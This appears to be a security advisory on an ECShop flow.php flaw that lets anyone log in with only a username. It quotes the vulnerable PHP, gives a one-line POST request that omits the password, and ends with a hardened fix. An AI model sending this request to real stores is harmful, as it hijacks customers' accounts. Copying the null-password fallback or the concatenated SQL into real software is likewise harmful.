<p>Affected file: flow.php, starting at line 188<br></p><pre class="">elseif ($_REQUEST['step'] == 'login')
{
    include_once('languages/'. $_CFG['lang']. '/user.php');

    /* User login / registration */
    if ($_SERVER['REQUEST_METHOD'] == 'GET')
    .....
    else
    {
        include_once('includes/lib_passport.php');

        if (!empty($_POST['act']) && $_POST['act'] == 'signin')
        {
            $captcha = intval($_CFG['captcha']);
            if (($captcha & CAPTCHA_LOGIN) && (!($captcha & CAPTCHA_LOGIN_FAIL) || (($captcha & CAPTCHA_LOGIN_FAIL) && $_SESSION['login_fail'] > 2)) && gd_version() > 0)
            {
                if (empty($_POST['captcha']))
                {
                    show_message($_LANG['invalid_captcha']);
                }

                /* Check the captcha */
                include_once('includes/cls_captcha.php');
                $validator = new captcha();
                $validator->session_word = 'captcha_login';
                if (!$validator->check_word($_POST['captcha']))
                {
                    show_message($_LANG['invalid_captcha']);
                }
            }

            /* $_POST['password'] is forwarded without checking that it was submitted at all */
            if ($user->login($_POST['username'], $_POST['password'], isset($_POST['remember'])))
            {
                .....
            }
</pre><p>The code above performs the login by calling $user->login($_POST['username'], $_POST['password'], isset($_POST['remember'])).</p><p>The login method is as follows:</p><pre class="">function login($username, $password, $remember = null)
{
    if ($this->check_user($username, $password) > 0)
    {
        if ($this->need_sync)
        {
            $this->sync($username, $password);
        }
        $this->set_session($username);
        $this->set_cookie($username, $remember);
        return true;
    }
    else
    {
        return false;
    }
}

function check_user($username, $password = null)
{
    $post_username = $username;

    /* If no password is given, only check the username */
    if ($password === null)
    {
        $sql = "SELECT " . $this->field_id . " FROM " . $this->table($this->user_table) .
               " WHERE " . $this->field_name . "='" . $post_username . "'";
        return $this->db->getOne($sql);
    }
    else
    {
        $sql = "SELECT " . $this->field_id . " FROM " . $this->table($this->user_table) .
               " WHERE " . $this->field_name . "='" . $post_username . "' AND " .
               $this->field_pass . " ='" . $this->compile_password(array('password' => $password)) . "'";
        return $this->db->getOne($sql);
    }
}
<br></pre><p>The login operation ultimately calls check_user; when the password is null, only the username is checked. flow.php neither validates nor initializes the password, so a login can be achieved with the username alone.</p><p><br></p><p>Exploitation process</p><p>url:.xxx.com/flow.php?step=login </p><p>POST:act=signin&username=xxxx&captcha=yyyyy</p><p>captcha is the verification code; it is not always required.</p><p><img alt="1.png" src="https://images.seebug.org/@/uploads/1434684326596-1.png" data-image-size="865,478"><br></p>
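<p>The following is an added example, not ECShop's own code, showing how the signin path and check_user() above would be written so that a missing password is a failed login rather than a username-only lookup. It assumes a PDO handle, a users table with user_id/user_name/password columns, and a $compile callable standing in for compile_password(); these names are assumptions, not taken from the report.</p>

```php
<?php
// Added example, not ECShop's code. Hardened replacement for the check_user() shown above.
// Assumptions: a PDO handle $db, a `users` table (user_id, user_name, password), and
// $compile, a callable that reproduces the site's stored password hash format.
function check_user_hardened(PDO $db, $username, $password, callable $compile)
{
    // 1. Refuse to authenticate without a password: an absent or empty field is a
    //    failure, never a reason to fall back to a username-only lookup.
    if (!is_string($username) || !is_string($password) || $username === '' || $password === '') {
        return 0;
    }

    // 2. Fetch the stored hash with a prepared statement; credentials never enter SQL text.
    $stmt = $db->prepare('SELECT user_id, password FROM users WHERE user_name = ? LIMIT 1');
    $stmt->execute([$username]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);

    // 3. Compare in constant time and only against a real row; unknown users and wrong
    //    passwords take the same path, so neither case reveals which part was wrong.
    if ($row === false || !hash_equals($row['password'], $compile($password))) {
        return 0;
    }
    return (int) $row['user_id'];
}

// Self-contained demo on an in-memory SQLite database with one constructed user record.
$db = new PDO('sqlite::memory:');
$db->exec('CREATE TABLE users (user_id INTEGER PRIMARY KEY, user_name TEXT UNIQUE, password TEXT)');
$compile = function ($plain) { return md5($plain); };   // stand-in for compile_password()
$db->prepare('INSERT INTO users (user_name, password) VALUES (?, ?)')
   ->execute(['alice', $compile('correct horse')]);

// Requests shaped like the report's POST body, with and without a password field.
$requests = [
    ['username' => 'alice', 'password' => null],             // field absent: rejected
    ['username' => 'alice', 'password' => ''],               // field empty: rejected
    ['username' => 'alice', 'password' => 'wrong'],          // bad password: rejected
    ['username' => 'alice', 'password' => 'correct horse'],  // valid: returns user_id 1
];
foreach ($requests as $r) {
    $uid = check_user_hardened($db, $r['username'], $r['password'], $compile);
    printf("password=%-16s => %s\n", var_export($r['password'], true),
           $uid ? "login ok (uid $uid)" : 'login rejected');
}
```

<p>In the flow.php handler the value passed would be $_POST['password'] ?? null, so an omitted field reaches the function as null and is rejected by the first check. The md5 stand-in only mirrors the legacy stored format; new code should store hashes with password_hash() and verify with password_verify().</p>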